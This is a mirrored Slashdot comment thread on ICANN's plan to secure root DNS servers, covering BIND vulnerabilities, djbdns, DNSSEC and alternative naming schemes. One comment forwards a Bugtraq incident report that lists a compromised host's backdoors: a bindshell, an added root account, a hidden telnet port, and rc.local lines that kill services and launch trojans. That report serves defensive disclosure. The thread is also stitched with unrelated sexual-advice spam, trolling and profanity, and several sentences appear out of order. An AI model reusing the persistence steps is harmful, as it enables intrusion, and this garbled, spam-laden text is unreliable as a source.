Slashdot Mirror
Securing DNS From The Roots Up
jeffy124 writes: "This article at ComputerWorld tells the story of how ICANN would like to replace the root DNS systems with secured servers. Lars-Johan Liman, one of the root operators, spoke about the concept at ICANN's annual meeting today. He discussed how the world's current redundant DNS system is vulnerable to DDOS attacks and yet-to-be-discovered root holes in bind that can ultimately undermine the entire Internet by taking away the name-IP mappings that are relied upon by just about everyone."
Bind may be vulnerable to security exploits! Sendmail may *not* be as secure as qmail! Walking through harlem with $100 bills hanging out of your pockets isn't smart! Sky is blue!
Some people just never get the news....
Just deploy Windows 2000 DDNS + Active Directory + Windows 2000 Kerb5 on the internet.
This will weed out all those unix crackers anyway.
The Internet is depending on unsecured servers for DNS? Now how am I going to sleep at night? Next you'll be telling me the earth isn't sitting snugly atop a giant turtle! Is nothing certain any more?
If you can backup the root servers on a "beefy laptop" at a moments notice, then why the worry about a DDoS? Just setup a "beefy laptop" and drive around from 802.11b to 802.11b and host from many networks! Or not.
I just don't get those fancy things. This site is 64.28.67.150 and that's the way I likes it.
How long till they get bought by Microsoft or AOL and start charging for inclusion?
...then malicious intruders will just go after the core routers, saturate lines, do things of that nature. Not that locking down DNS is a bad thing, but you can't defend everything all the time.
Easy does it!
This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
I have yet to find the great reason of why everyone uses BIND. I've been working on my own DNS server just for kicks. The protocol itself is trivial. It can be handled so easily, but yet, if you look at BIND's source code, you can't tell what is going on at all. So, why does everyone continue to use it? Or better question, why hasn't someone written a better alternative?
kc8apf
Is there anyone here knowledgeable about this who can comment on a few things?
I'd love to see (more closely) another implementation of the DNS system other than the 3 or so commonly found.
otherwise, someone might actually implement this while its still useful ....
In other news, the ICANN today approved the use of 'electricity' on the Internet.....
Does it strike anyone else as a bad thing that all of the root nameservers, and for that matter almost all important nameservers, run BIND? Ergo, a serious security bug can be used to take out all of the root nameservers.
We need another DNS server that has the (relative) standard compliance and scalability so that we could have some other server software running on some of the root servers. Unfortunately, all of the alternatives I know of don't scale to that volume of transactions, aren't nearly as proven as BIND, and many of them have standards compliance issues worse than BIND.
...that this overhaul of DNS is sponsored by the RIAA?
"I'm sorry sir, but your website contains copyrighted material -- I trust your users have noted your IP address somewhere?"
:).
<!-- DHTML / JavaScript menu, popup tooltip, Ajax scripts -->
Real men surf the net using ip addresses. (And NOT in base 10)
Also OpenNIC is an ICANN indepent root system ... why not just use them instead of ICANN?
Ignore the "p2p is theft" trolls, they're just uninformed
It's important to remember that the DNS servers themselves are patched and secured (i hope) but the issue , as I see it is that there are only so many dns servers.
If you could shut down the root DNS server and then work your way down, you could wreck havock on the whole internet. The net would still work (probably) but you would have to use ip's, not names, and thus the huddled masses would be lost.
I know this is slightly offtopic, but this was there on the bugtraq mailing list, thought ppl here may find it interesting:
/var logging is recoverable. This machine was running
/usr/bin/bin/u/src/ircd
/u/, mysqld klogd ...)
.dk domain, as well
.cais.net .cais.com
/usr/sbin/init.d
/sbin/ipchains -I input -p tcp -d 0/0 3879 -j DENY
To: bugtraq@securityfocus.com
Subject: Fwd: Possible DDOS network being built through ssh1 crc compromised hosts
I am making this notification to assist in determining whether other
folks have been affected by this attack.
An associate's home NAT gateway linux box was hacked by what I am
guessing was the ssh1 crc bug (ssh1 was the only exposed service).
This
machine looks to have been compromised on Nov 2nd at 1:15pm PST, I
won't know for certain until I obtain his hard disk later today, and
provided that
redhat 6.2, reasonably patched except for the fact that he was still
running ssh1.
It appears that someone may be building up a network of (potentially)
DDOS hosts. I have done some quick research and found no matches for
the signatures I have been able to identify so far.
Using the Chkrootkit (www.chkrootkit.org) utilities did not identify
a known trojan pack, so if this isn't identified in the wild, I'm
already referring to it as the LIMPninja.
It also appears that this particular host was used as a central host
for other LIMPninja zombies. Also, haven't been able to determine
what the command structure it is that the remote bots act upon.
The following is by no means complete, even after a full examination
of the drive has been completed, as there was never any file
integrity base line completed(a shame).
The attack appears to be scripted as all changes happened within a
minute, except for the IRC server which was not installed until 2
days later (and manually). When I found this particular irc net
there were over 120 hosts all communicating via IRC. This host was
found to be running an unrealircd daemon from
listening at port 6669.
All other compromised hosts were joining this irc network
(ircd.hola.mx holad) on channel #kujikiri with a channel key of
'ninehandscutting'. All bots joined as the nick ninjaXXXX where XXXX
is some RANDOM? selection of 4 upper case letters.
Several ports were listening
3879 term (this port had an ipchains rule blocking all external
traffic - placed by the attacker's script)
6669 ircd
9706 term
42121 inetd spawned in.telnetd
Logs were wiped, and couldn't find a wiping utility so I'm thinking a
simple rm or unlink was used, so I'm hoping to find more details when
the disk is in hand. File modifications that were made follow:(not
necessarily a complete analysis yet)
clearly Trojaned binaries (probably others)
/bin/ps
/bin/netstat
/bin/ls (this ls binary was hiding several things, directory
structures named
/usr/local/bin/sshd1 (the file was just several hundred bytes larger
than previously)
Binary file/directory additions
/usr/bin/bin/u/ An entire directory structure containing the ircd
server source
/usr/bin/share/mysqld (looks like some type of irc spoofing proxy)
/bin/klogd (almost looks like an ftp proxy)
/bin/term (A bindshell of some sort)
/usr/sbin/init.d was added and is exactly the same file size as term
System configuration files that were modified/added
/etc/hosts.allow made specific allowances for the
as
/etc/passwd two new accounts were added with the same password (des
hashes -NOT MD5)
/etc/shadow The added accounts were lpd 1212:1212, and admin 0:0
/etc/inetd.conf 200+ lines of whitespace added, and then the single
telnet entry
/etc/services was modified for telnet to start on port 42121
/etc/resolv.conf a new nameserver was added...
/etc/psdevtab haven't examined closely yet
/etc/rc.sysinit a line was added to start the
trojan/backdoor
/etc/rc.local after much whitespace was added.... following lines at
the bottom of the rc.local file
killall -9 rpc.statd
killall -9 gdm
killall -9 gpm
killall -9 lpd
term
klogd
"/usr/bin/share/mysqld"
-----
This should assist other ppl who have had similar attacks...
...as is the case with register.com (and possibly other registrars), there will always be backdoors into their systems so long as people write code, seeing as how people still make mistakes. See also: putting a $100K firewall in front of a system that you never bother applying ACLs to. It'd be apples and oranges if this all didn't repeat itself so often.
Easy does it!
This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
Not so with DNS. While it is a hierarchical system, there are numerous security issues with it. BIND, the software overwhelmingly responsible for the implementation of DNS, has plenty of holes. The machines are also vulnerable to low-tech DOS attacks. So what? Any centralized machine offering a service which consumes bandwith is vulnerable to DOS attacks. It's a well known issue and there is lots of research on ways to combat it: load balancing, ICMP filtering, etc.
The bottom line is this. Don't be too worried about DNS going down. Unlike www.microsoft.com or www.whitehouse.gov, there is little incentive for a malicous script kiddie to attack DNS.
Of course, if you're really paranoid, start writing down the IP addresses of your favorite sites.
BEN
There are 13 root servers in the world, I believe. Their locations are well known. Yes, they are well secured, but still, if terrorsts want to more or less shut down the ENTIRE NET from the point of view of end users, they'd just have to take out the root servers and presto!
.net, .org, .edu)? That makes matters even worse.
Is there any other critical network as vulrenable as the Internet? Telephone, Electricity, Water, etc... they are all much more harder and less vulrenable than the Net in terms of their architecture.
Don't some of the root servers, or at least their datacenters, handle the gTLDs as well (.com,
With the Net no longer a academic resource, but mission critical for business today, I'm surprised that only NOW people are starting to find that this COULD be a single point of failure for the Internet.
George W. Bush
President, United States of America
- Sun has a horrendous response time on vulnerabilities in Solaris. One study I read said that the average "exposure time" between an exploit release and a corresponding patch release was about 40-50 days. It's no wonder so many Solaris boxes get cracked, given their relative obscurity.
- Linux has such advanced features as POSIX capabilities, a working chroot() syscall that actually isolates processes, and safe privilege bridging mechanisms. Commercial UNIces have none of these. They allow Linux admins to use a much more fine-grained security model to control potentially rogue processes like BIND.
- Linux (except for SuSE) has far fewer setuid programs. On most UNIX systems, ps, whodo, netstat, xlock, and several other ridiculous programs are either setuid root or setgid kmem. Yes, even on OpenBSD. No wonder they have local root exploits so often.
- Linux has proper restrictions on signal passing. Other UNIces can be tricked into delivering malicious signals through several ioctl calls. (I have a Solaris source code license and I have seen several areas where more checking needs to be done. Sun ignores my complaints.)
Commercial UNIX operating systems do have some scalability advantages over Linux when run on big iron (64+ processor) machines. But when the integrity of the DNS system is at stake, there is no choice other than Linux.~wally
There seem to be some pretty big problems in how the whole DNS system works in the first place; for a system with a fairly high degree of built-in redundancy, I've often found websites where ONE of their DNS servers has gone down, and I can't access the site. The other DNS somehow isn't queried, other caching DNS servers along the chain aren't queried, and it fails. The IP address I'm looking for is, in theory, sitting in a thousand caches all over the net, but it's not fetched? The loss of Microsoft's DNS a few months back is a good (although not particularly worrying) example.
Then again, maybe I don't notice the times it DOES work like it's supposed to.
-"I still believe in revolution; I just don't capitalize it anymore." - srini!
I remember that. That part always makes me laugh until I cry, then I laugh some more.
Yeah, I found a security hole... But all I got out of it was a toy Yoda.
People still run bind as root?!
STREAMS is nothing but a gaping security hole. It practically invites ordinary users to run their own code in kernel space. Until they change the architecture so that non-root users can't just ioctl(I_PUSH) their own r00tkit module into ring 0, these OSs will never have any security to speak of.
Hope this wakes up some people who should be spending more on their DNS.
Hell, of course not. None of the corporate suits reads slashdot do they?
asl
It's not difficult to get a nameserver backup and running, and the volume of data maintained by the root server is nothing in quantity compared to, for instance, .com.
The main problem is that all the second-level servers have fixed pointers (usually hard-coded, I believe, in text files) to the root servers.
Assuming some form of robust authentication could be worked out, this could be a killer app for IP multicast, where, if a root server goes down, once the replacement comes back up, the IP of that server gets instantly disseminated to all secondary level (or maybe even even futher down) nameservers around the world rather than manual notification (or however it works now), so that downtime would be minimal.
Sound viable?
George W. Bush
President, United States of America
if, by some freak incident, all DNS entries pointed to one (or a very small group of selected) IP? All requests would be directed to a concentrated number of IP. That's a mass DDoS for ya!
Where on earth did you come up with that .sig?
:-)
ROTFLMAO
Real men's DNS servers are /etc/hosts.
As long as no one opens their mouth about possible security leaks, we'll be safe.
Last post!
Anyone know the IP address of Goatse.cx?
You've been looking at goatse.cx so much that you've gone blind - you sick fuck.
The IP address there 6 times on the page you linked to.
Thanks, David U.
# Hack the planet, it's important.
Here is a summary of the report that talks about Sun's poor response time to security issues.
Don't get me wrong. It's a great system, it's worked for a very long time, it does it's basic job admirably. My single main issues with it are it's centralization, and increasing politicization.
.info proves.
I've given this a little thought over the years. There's a few fundamental issues with the centralized DNS system.
I've tried kicking around a few replacements ideas, like a peer-to-peer exchange system carrying certificates that act a little like resource search records.
The FreeNet project actually gives a good model for how to distribute and search for these 'domain certificates'.
I'd like to see a system that you essentially 'anonymously' submit namespace entries to. Conflicts are resolved based on context. If a dozen people want "money.domain", fine. If you try to browse to it without any context, you have to choose which one you want based on other information in the certificates (full name, location, nickname etc) and once you've chosen, that context sticks. URL's would need to be extended to also carry this context, which probably need to be a cryptographic signature to prevent abuse.
It constantly amazes me that people are willing to pay $50 to 'own' a record in a database. The domain land grab was just stupid... in virtual space, you can always just make more land. As
DNS will obviously persist for decades, (simply because of the financial and general mindspace investment in 'dots') but hopefully as only one of a plethora of address resolution systems. Name resolution needs to be a pool, not a tree.
"For as long as the DNS system exists, the Internet will never be free" - Morpheus, while very Drunk
Jeremy Lee | Orinoco
my son recently began sunbathing nude outside and also walks around the naked like its no big deal...should i encourage this or as a mother be concerned that hes exposing himself too much?
when I read that article, i recalled a so-called "success story" of one of those secure linux projects (eg, HP's, NSA's).
Someone was getting hacked via a bind buffer overflow exploit on a routine basis, giving the attacker root access. So he installed one of those secure OS's and set it up such that bind ran under a restricted permission set. He basically made named's policy was to not allow permission to launch a shell or open ports (other than the DNS listener ports).
When the script kiddies returned, they would overflow the buffer - but when the instruction to launch a shell came across - bam! Kernel issued a permision denied. The kiddie's script wasnt programmed to handle that, which led to a core drop and total system crash.
Kiddie tries again sometime later and attempts to setup a backdoor. Same problem. Kernel denies the opening of a port, core drops again and crashes the box.
While the admin had to restart the server a few times at the mercey of the kiddie, a few more failed attempts taught the kiddie his lesson. He just plain gave up.
Moral of the story being that while named still had the same buffer-overflow hole, the OS was configured to contain the named's permissions once that hole was exploited.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
Oh how much the world would be a better place if these technologies were implemented!
My girlfriend has very long, great orgasms. She usually has about three or four right after another. But during her orgasms, she pees. It started out as just a little bit a couple months ago and slowly progressed into more. I wasnt sure at first if thats what it was or not because it had no odor or flavor. i mentioned it to her once before and she took offence to so i didnt bring it up again. tonight during her orgasm she went a lot, and this time you could smell the urine. I am ok with whatever her body does, it really doesnt bother me, but she thinks herself to be a freak and it really bothers her. Now im not sure if it is going to mess with our love life. what can i do to make her think she isnt a freak? Is this something that is common in other women? Is there a way to stop her from peeing? Thank you in advance!
Hi, I am the single-father of an 11-year old son and have a question. Well, when i was a young boy in my teens I was always afraid to be exposed nude in front of my parents. And as a father now, i want my son to feel comfortable around me, and to not have to run away and hide when nude. I would like for him to become comfortable with his sexuality. So my question is, how should i approach this. Should I just not wear any clothes around the house, and hope that he gets the hint that its okay for him to also? or should i just leave it to him and let him decipher his own feelings? Any and all comments would be great.
My girlfriend and I are both 24. We met as sophomores in college and had a wonderful relationship all through our college years. During this time our sexual relationship was manual sex and occasionally oral, but we both enjoyed it tremendously. Right after we graduated, we decided to have intercourse, and we have continued to do so. About a year ago, I was sent to Hawaii for a week on business. I was able to take my girlfriend with me. The business portion of the trip was short, and so we spent the rest of the time having fun. This included sex several times a day, in motel rooms and sometimes on secluded beaches. By the end of the week, I was starting to get a little sore, and this disrupted further sexual activity. By the time we got home, I was very sore and my glans looked blistered. I put an antibiotic ointment on, and continued with my daily activities, thinking that this would improve. Over the next week, the skin on my glans peeled. Then gradually, over the next week, the soreness went away, and I began sexual activity again. However, I have never felt the same since. The glans is not nearly as sensitive. I no longer enjoy manual stimulation, and oral sex is not great. Intercourse works, but mainly because of the feeling that my entire penis is engulfed, not because I am feeling much through the glans. I assume that I have had serious nerve damage to the glans. But no doctor seems to take this seriously. They have told me that they cant diagnose the problem, that I should see a psychiatrist, and one even suggested that I should visit a prostitute because I needed more stimulation!
Any ideas as to what would have caused this? My girlfriend suggested that maybe I picked-up some sort of bacteria, virus or fungus from having had sex on the beach, and that it got trapped under the foreskin (I am not circumcised). Or, maybe I had some sort of allergy to something in Hawaii.
Of course, whatever it was appears to be gone now, but the lack of sensitivity remains. My girlfriend has never shown any symptoms, and her doctor says she is competely healthy. So, what ever this was does not appear to have been communicable.
I am concerned that I have permanent damage.
This time I will be prepared.
/etc/hosts file so I can be immune to the attacks
I am downloading as we speak all the DNS records in the planet into my
I encourage others to do the same.
thats not it you dumb fuck. go suck a big donkey nut! that ip addresss goes to a site called Hick.org
ICANN is only relavent as long as everybody uses their DNS. I don't understand why somebody with some moral authority in the IT world doesn't just set up an alternative. I know there are in fact several alternatives, but these are private companies that nobody has heard about. .tld (although you could set up a few with restricted access, perhaps '.trademark' or something like that). That way, for example, IBM could use "buy.ibm", while somebody who doesn't like IBM could use "dontbuy.ibm". There would be no way to purchase all the domains under a .tld.
So who could do it? The IETF and the ACM come to mind. There are probably a few others.
Note that you don't have to switch all at once, you can still fall back to legacy ICANN domains if the new domain system doesn't find a match.
My "ultimate" domain name scheme would allow anything as a
If you celebrate Xmas, befriend me (538
ICANN would like to replace the root DNS systems with secured servers.
/etc. Then, a patent would be granted for "a static internet address to domain name mapping system" and "a static domain name to internet address system"
/. before, but there are many people who run their own DNS roots, underground dns if you will. Anyone have any links?
Ok, how long before someone at ICANN suggests that the servers should maintain domain to ip mappings in static files. Something like a file called hosts and that could be stored in
Sorry, I'm just in a sarcastic mood given the fact that they actually use bind. Does anyone find that a little scary?
I know it's been brought up here on
Chaos, Mayhem, and Destruction: Not
Wow!! Do you think NetCraft is lying then?? Or is it just a big conspiracy??
I was wondering, I have had sex a few times now and boy do i enjoy, it but my question is if a girl just asked if she could go down on you youd probably say yes but I am a guy, and I want to know what it feels like to go down on another guy. Im pretty sure im not gay as guys in general repulse me if i even try to think of them that way but id really like to go down on a cock. I dont need the favour back but if aguy asked you, would you let him?
Bill Gates has worked his magic once again. XP is the gateway to the future of computing. The wizards of Redmond have stepped up to the plate and once again and hit a grand slam. Ask yourself could life be any better.
.NET, PassPort and HailStorm computing will enter a platinum age. Developers using the latest Microsoft development tools will be creating software wonder after wonder.
You want security get XP. You want a dynamic Web experience get XP. You want your computer to sing and fly get XP. I have and I can tell you my computer soars like and eagle. I am flying when at the keyboard. Truly, it is better than sex.
By this time next year when old technologies are replaced with
Don't listen to the nabobs or negativism or open source reactionaries trying to pawn off a dying operating system (Linux) as cutting edge. If you want security, cutting edge technology step up to the plate and upgrade to XP.
Nuff Said.
Help! i have a small piece of skin in only one area of my penis that connects the head to the little loose skin. I am very worried about this. Ive heard it could be regrowth after circumcision. Please help!
Bill Gates has worked his magic once again. XP is the gateway to the future of computing. The wizards of Redmond have stepped up to the plate and once again and hit a grand slam. Ask yourself could life be any better.
.NET, PassPort and HailStorm computing will enter a platinum age. Developers using the latest Microsoft development tools will be creating software wonder after wonder.
You want security get XP. You want a dynamic Web experience get XP. You want your computer to sing and fly get XP. I have and I can tell you my computer soars like and eagle. I am flying when at the keyboard. Truly, it is better than sex.
By this time next year when old technologies are replaced with
Don't listen to the nabobs or negativism or open source reactionaries trying to pawn off a dying operating system (Linux) as cutting edge. If you want security, cutting edge technology step up to the plate and upgrade to XP.
Nuff Said.
yeah, i want to see more gaping assholes...........dont you?
I met this cute girl in one of my classes a few weeks ago, and we have gone out three times, and hung out together some. I am 19 and I think shes either 18 or 19. We get along pretty good, and last night she asked me if I would like to go to a lingerie and swimsuit show. I said sure, and then she said she would come to my room and give me one. Well, theres nothing Id like better, but what is she likely to expect from me? Ive never had anything like this to happen to me before. Do you think she expects full sex, including intercourse? Or does she just want me to appreciate her nice body, without doing anything sexy? Or, is there something else that I havent thought of? I have never had intercourse, and I am afraid I will disappoint her. Maybe she thinks Im more experienced than I actually am. If she gets naked, Ill probably start shaking. Any thoughts about this? Is there anything I should do to stay calm and think straight? Maybe just call the whole thing off?
a setting to show the LOWEST SCORES FIRST. It would help out all us trolls.
please mod this interesting
You can't do zone transfers using djbdns for one thing. DJB thinks that zone transfers are evil, and has his own method for doing the task (rsync over ssh I believe), but whether they're evil or not is beside the point. Like it or not, zone transfers are a part of the core DNS protocols and any proper successor to BIND must implement them all. Starting a standards war with the IETF is not something I want to have along with a name server I deploy. Let Bernstein write an RFC for publication describing his idiosyncratic methods and get the IETF to ratify it as a core standard if he wants, if he truly thinks his way is the better way. The way he operates reminds me more of the way Microsoft handles standards than anything else.
Besides, djbdns is also deficient in a far more important way (for me and to a lot of people here on Slashdot anyhow, I hope): it's actually proprietary software with a limited license for gratis use. It's not Free Software or even Open Source, not by any reasonable definition of the term. There is no license along with his programs, and absent a license you have NO RIGHT to share, study, or change Bernstein's code!
Qu'on me donne six lignes écrites de la main du plus honnête homme, j'y trouverai de quoi le faire pendre.
If anyone ever decides to specify standards, lets have one that could pass commands to the upstream router to block attackers IP addresses from DDOS packets (which are easy to identify) before they get to the NIC card.
Router software could then have this standard feature to tell it to drop packets if they are coming from an IP address in some "shitlist" thats maintained by the upstream provider. Something like this can go a long ways to stop DDOS attacks. Of course, getting the router people like Cisco to come up with something like this, might be hard to do, as these companies like to always set their OWN standards, and nobody can agree on anything. (SIgh!)
Yeah, I'm fucking serious, what the hell is going on. Some cow logo bullshit. Goddamnit, can a server somehow recognize if goatse.cx was used to ocntact it and then display goatse.cx but if the raw ip is used not? WTF??????
When will Bill let me have the dynamic Web experience, security and singing and flying all at the same time though?
Look ma, I'm MULTITASKING!
I guess thses must be typos...
http://cr.yp.to/djbdns.html
http://cr.yp.to/djbdns/faq/axfrdns.html#config
http://cr.yp.to/djbdns/axfrdns.html
http://cr.yp.to/djbdns/axfr-get.html
Please... learn to have an *informed* opinion.
check here:
http://cr.yp.to/djbdns/axfrdns.html
this supports outgoing transfers. Incoming are a possible security risk (NO authentication happens in most cases, other than IP address checking, IIRC), making this a prudent decision, IETF or no.
BBK
Comment removed based on user account deletion
That's news to me. I always thought Network Solutions or whoever runs the other root name servers had their own proprietary and more robust and scalable DNS software.
Qu'on me donne six lignes écrites de la main du plus honnête homme, j'y trouverai de quoi le faire pendre.
Yes, I know the answer is that's the way it's always been done, and it was fine for few thousand university and government hosts, but isn't it time to obsolesce the whole centralized hierarchy of name resolution?
At the very least, name server caches could be peered among ISPs.
At the most extreme, how about devolving name resolution out to the very edges of the net to end user's pcs? Doesn''t every PC have a HOSTS file already? Clay Shirky described ICQ as the first program to do an end run around the DNS...what are IM programs besides alternate name resolution systems with messaging features tacked on? (And doesn't that perspective give a frightening new aspect to Hailstorm/My Services/Passport/MSN Messenger?)
So why shouldn't end users be swapping resolution data across with their instant messages? Why shouldn't websites be passing resolution data directly to site visitors who then pass? Especially in the case of weblogs?
Yes, I realize that you don't want ecommerce site lookups hijacked by fraudulent resolution data...so there would be a market for a secure resolution service that would behave just like the DNS with Added Security Flavor.
The best sort of data security is lots of backups.
Certain firewalls are contained and operate from a write-protected floppy disk. Isn't it possible to run a whole DNS machine from a tiny distro contained on a write-protected floppy? This would sidestep encryption issues as well as having that Old Skool appeal that the kids are so into these days :)
Comment removed based on user account deletion
It is here. Damn bastards. Goatse.cx was just a redirection to the goat/ subdir of that hick.org cow logo site, TROLL ON, MY IDEA FOR JUST IP'S CAN LIVE DOWN WITH DNS
Hope davidu could find the offsite host he's looking for.
If the HTTP request is for xxx.xxx then it will serve a different site than it will if you request yyy.yyy. Goatse.cx has no soul, nor IP.
click here for troll pix!
geek tragedy
Tune in tomorrow when we revisit the 'Bass-O-Matic' as a method for cloning.
See: Not funny as in "funny ha-ha"...must be over 18 to get the joke.
click here for hot pix of trolls in love!
Note that the root servers serve up the names for the .COM/.NET/.EDU/.ORG/.MIL/ + the new ones like .BIZ/.INFO + the country domains. The largest one of them all, .COM, is served from a different set of servers.
.COM's...
I could make my own local cache.
Now if I could only get a copy of the nameserver list for all those
For comparison:
$ dig ns .
vs
$ dig ns com.
(apologies to non-BIND users, you don't use 'dig')
Not a complete solution, but it would be enough to keep the net going if DNS went down.
No, Thursday's out. How about never - is never good for you?
Is it my imagination or is ICANN actually working on getting their job done rather than horribly complex politics (more complex than needed to solve the problem), or trademark/legal craziness? There's some background at the page of the ICANN DNS Root committee.
Now, I'm pretty skeptical that a closed source DNS server from Register.com is going to be a big part of the solution, but even that I don't really mind so much. Having a few alternatives is good if for no other reason than helping to keep BIND from stagnating.
The article didn't talk much about DNSsec (or this older page) which has got to be part of the solution (to try to give the 10 second summary, when a client makes a DNS query and gets a response, it is kind of tricky to ensure that the response is really from the correct server, and DNSsec uses crypto to solve this and other problems).
It seems like most serious crackers are in it for the notoriety. If the entire internet was brought down, how would anyone know who pulled off the ultimate crack?
This Is something I was just looking at... very interesting, shows what techniques have been used to hijack domains.
I'm a minister!
Work it out...one page of text is 10k.
One page is 80 lines...80 entries.
So if you only did one entry per page (host file protocal), you'd only be using a portion of the page...say 30%.
At 10k per page & 80 lines, that's 12.5k pages per million records.
How many entries do we have to work with as of midnight last night?
10 million records is 125 million pages..is 1.25 billion k which is 1,250 gigabytes....or 850 CD-R's per every 10 million records. Or if we focus and use 30%, it works out to 255 CD-R's for every 10 million records...did I do that right?
Mine is too long..maybe we should get together.
$ ping www.slashdot.org
PING slashdot.org (64.28.67.150): 56 data bytes
That's 64.28.67.150!! Start memorizing now!!!
python -c "x='python -c %sx=%s; print x%%(chr(34),repr(x),chr(34))%s'; print x%(chr(34),repr(x),chr(34))"
The answer is simple, just ask the author of IPF how he did it...
Change the BIND license to make it much more restrictive, then sit back as the OpenBSD developers build their own simpler, better, more stable, and much more secure, replacement.
SSH.
IPF.
BIND?
Slashdot gets worse every day... Pipedot: News for nerds, without the corporate slant
That's because the guy that owns hick.org hosts goatse.cx. Hi, I'm name-based virtual hosting. Get to know me.
This is clearly just a ploy to establish iron-fisted control over the internet. What is more likely to be for the best in the long run is an extensible, completely open holographic DNS schema distributed across each client. That the problem of DNS and the fecundity of PtoP have not been mated seems to me an absurd thing.
This is the difference between hackers and bureaucrats in a nutshell. Centralized control over resiliant sophistication. God damn each of those bimbo sellout engineers for their short sightedness. If I had one ounce of say, one chance at effecting or affecting the logical and liberty enhancing solution I mention above, I could consider my life more or less comlete. (And I'm a card carrying member of ICANN at-large, dammit, and so much closer to such a goal than the bulk of you all!!) This is surely going to be the doom of the net as we know it.
How long before the governing body (ICANN) of such a rigid and authoritarian system becomes a mere appendage of one of the big players (IBM, AOL, MSFT)? That ICANN is already rotten with corruption is apparent to almost everyone, but what I am asking is how long before even the lip service is discarded? I am aghast at the thought of a monopoly on basic existance that such moves as this do threaten.
This is a call to arms. Anyone involve with open DNS or PtP should reply to this thread or email me at: this adress to discuss superceding such insidious and freedom wrecking evil as presented in the parent story.
Thankyou.
get it ? :)
ok, I tried to be funny.
And yes we do use bind at work (and yes I'll look into upgrading again).
New things are always on the horizon
64.28.67.150 is the only IP you need!
This space left intentionally blank.
Reading this article, I have to start wondering if maybe I'm misunderstanding the problem.
The actual root servers are only queried for the top-level domains and while they have rather massive databases, the types of queries they get is limited.
Now, I'm going to assume that given all the money collected for domains, there somewhere exists a nice pot of money available for running root DNS servers. If there isn't then something is seriously wrong with the administration of DNS.
Segmentation of the actual root servers from the world by utilizing a front-end dns cache that would rewrite the actual DNS queries would solve a lot of problems.
First, rewriting queries would allow an amazing amount of sanity checking to be done on the query itself and should prevent exploiting the back-end root servers directly.
Second, as front-end dns caches can be extremely simple and require almost no configuration, the OS installation can be absolutely minimal excluding even shells. You could go as far as to use an OS that allowed you to revoke system privledges such as certain syscalls (fork, exec, open, etc aren't all that necessary once everything is running) and even make the caching DNS server run as init (though you must have something to bring up networking interfaces.)
Physical segmentation is obviously important as well so a private backbone strung between all core root servers and a seperate interface on each front end cache to access them would help quite a bit.
Of course then comes the issue of DoS attacks which again should be rather easy to solve considering what we are talking about. Just buy a lot of front-end cache systems. You would think given how important root servers are and how much money domain revenues generate, buying a thousand or even ten thousand machines and sticking them in every major network access point wouldn't be all that big of a deal.
Now you still have to deal with the fact that most DNS servers still have a static list of root server IPs. Thankfully, the simple DNS queries that hit root servers can be done with a single UDP packet request and response (until you have to work up the hierarchy) making them prime targets for one of the many clustering solutions out there from simple IP sharing virtual servers to routing protocol tricks.
Of course, I may be oversimplifying the problem.
The world is neither black nor white nor good nor evil, only many shades of CowboyNeal.
Women drinking a glass of gue: Mmm thats good fish.
That happens to be my favorite saturday night live skit. I miss the old gang of the 70's. Not the crap they have on today.
http://saveie6.com/
The maximum uptime I have got for a Linux box is only four months. Screw uptimes - the only way you get uptimes that big is if you haven't upgraded your system and you're leaving it with gapping holes. All those from your top ten lists have regular holes and updates. Not installing them to retain uptime isn't something to be proud of and it's not a measure of an OS.
Look at it this way, each record needs four bytes for the IP number, one byte to mark the end of the line, and the rest is the second level domain. Each top level domain would have its own file.
So, with 10 million records, and a mean name length of 15 characters, you would need 15+4+1=20 characters per record, or about 200MB. If you compressed the data, it would be a whole lot smaller.
Putting it in /etc/hosts, you would need at most 16 characters for the IP number (trailing space), the domain name, a top level domain name, and \r\n. So you get 16+15+4+2=37, or about 370MB.
Of course, each domain also has meta data, such as IPs for backup name servers, name and address for the contact person, date the registration expires, etc.
Gee, after 10 years of numerous remote-root exploits and a legacy of bloat, bugs, and overall abominable design, they're JUST NOW starting to think that BIND might not be the way to go? Wow.
Because of the size of data that they have to serve and the incredible bloat of BIND, the root name servers are very large machines. Let's say that they chose Dan Bernstein's DJBDNS. The size of the machine would be reduced by at least half, and security would instantly become a non-issue (at least far as the DNS software is concerned.)
I know, DJBDNS isn't for everyone. It doesn't have an FSF-approved license, and of course, carries design features stemming from Dan's immense ego. But it serves as an example that reliability, efficiency, and security are out there. Between it and the other alternatives, I think that it's inexcusable for the root name servers to run BIND, and I can't think of any reason why anyone would want to use it. But hey, that's just me.
Shoot, with all the recent talk about clusters, they could use an extremely scalable cluster of commodity hardware for a relative pittance. Put a traffic director using LVS in front of a number of single- or dual-CPU machines, all of them (including the director) commodity hardware, and you have the capability to serve out over a gigabit/second of DNS- securely, reliably, efficiently. It's hard to ask for more.
steve
Oh, you're not stuck, you're just unable to let go of the onion rings.
Was it just me did the description give the impression that we were actually going to be told WHAT security measures were being proposed? Instead they say physical security is the least important and we'll have a meeting because of the terrorists. Oh and by the way... There are probably holes in BIND. Kinda like saying water is wet!
Normal people worry me!
<generalisation type="Sweeping"> Most of the default systems that the Internet is based on are inadequate for the expectations of business. There are plenty of alternatives that do work but it's often down to trusting your ISP that their systems are sufficiently bulletproof, and things like that are often not included in SLAs, and indeed not even considered. I'd love someone to show me an ISP who consider these things business critical. </generalisation>
There's an alternative like MaraDNS, which is public domain.
I don't think it supports Bind's and DjbDNS zone files yet, but i believe it's coming along nicely.
Does anyone have experience with it?
Well, don't worry about that. We can get you back before you leave. (Dr. Who)
I agree that the "domain land grab" was very silly. It was all about greed and promised very little in return for the $50,000+ that some companies and individuals paid for their domains.
However, I am compelled to point out that the "mindshare" for which these organizations compete is real. Consider the example of whitehouse.gov vs whitehouse.com. The latter definitely exploited the mindshare of the former in order to grab a larger audience.
Even SlashDot has a piece of your mind.
Common implementations of DNS and even the protocol itself have quite a number of flaws which make DNS spoofing rather easy. DNS spoofing is targeted at the clients, and the root servers have nothing to do with it, so you can't solve this problem at the root servers. DNSSEC won't solve it completely either because no one expects clients to move to DNSSEC anytime soon (you don't install full resolvers on clients, either).
In additions, occasionally, DNS database entries are wrong (although the servers are operating correctly), due to maintenance errors or social engineering attacks. Security on the root servers or even DNSSEC does not address this problem at all.
